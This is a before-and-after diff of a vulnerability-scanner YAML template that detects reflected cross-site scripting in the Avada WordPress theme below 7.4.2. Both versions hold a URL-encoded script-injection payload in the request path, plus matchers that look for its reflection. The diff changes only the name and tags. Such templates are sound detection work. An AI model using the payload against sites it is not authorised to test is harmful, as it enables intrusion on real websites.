vulnerabilities/other/avada-xss.yaml (before)
id: avada-xss

info:
  name: Avada < 7.4.2 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue.
  reference:
    - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
    - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
  tags: xss,wp,wordpress,wp-theme,avada

requests:
  - method: GET
    path:
      - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'
          - 'avada-footer-scripts'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/other/avada-xss.yaml (after)
id: avada-xss

info:
  name: Avada < 7.4.2 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue.
  reference:
    - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
    - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
  tags: xss,wp,wordpress,wp-theme,avada,wpscan

requests:
  - method: GET
    path:
      - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'
          - 'avada-footer-scripts'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/other/avada-xss.yaml (diff)
@@ -1,14 +1,14 @@
 id: avada-xss
 
 info:
-  name: Avada < 7.4.2 - Reflected Cross-Site Scripting
+  name: Avada < 7.4.2 - Cross-Site Scripting
   author: Akincibor
   severity: medium
   description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue.
   reference:
     - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
     - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
-  tags: xss,wp,wordpress,wp-theme,avada
+  tags: xss,wp,wordpress,wp-theme,avada,wpscan
 
 requests:
   - method: GET
